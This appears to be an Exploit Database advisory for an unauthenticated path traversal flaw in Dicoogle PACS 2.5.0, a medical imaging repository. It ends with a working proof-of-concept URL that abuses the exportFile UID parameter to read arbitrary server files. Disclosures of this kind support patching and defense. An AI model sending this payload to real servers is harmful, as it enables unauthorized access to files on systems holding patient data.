EDB-ID: 45007 | Author: Carlos Avila | Published: 2018-07-11 | CVE: N/A | Type: Webapps | Platform: Linux | Vulnerable App: N/A | # Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
# via GET is vulnerable.
# 2. Proof of Concept
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
